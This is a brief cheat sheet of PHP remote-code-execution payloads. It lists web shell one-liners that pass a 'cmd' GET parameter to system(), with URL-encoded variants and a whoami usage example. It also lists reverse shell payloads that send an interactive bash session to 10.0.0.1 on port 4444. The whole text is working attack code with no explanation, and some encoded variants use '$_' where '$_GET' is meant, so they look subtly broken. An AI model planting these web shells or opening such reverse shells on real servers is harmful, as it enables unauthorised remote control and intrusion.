PHP RCE Cheat Sheet
Web Shell
<?php system($_GET['cmd']);?>
<?php echo system($_GET['cmd']);?>
<%3fphp+system($_['cmd']);%3f>
<%3fphp+echo+system($_['cmd']);%3f>
We can access to /?cmd=whoami
.
Reverse Shell
<?php system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1');?>
<?php system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"');?>
<%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f>
<%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f>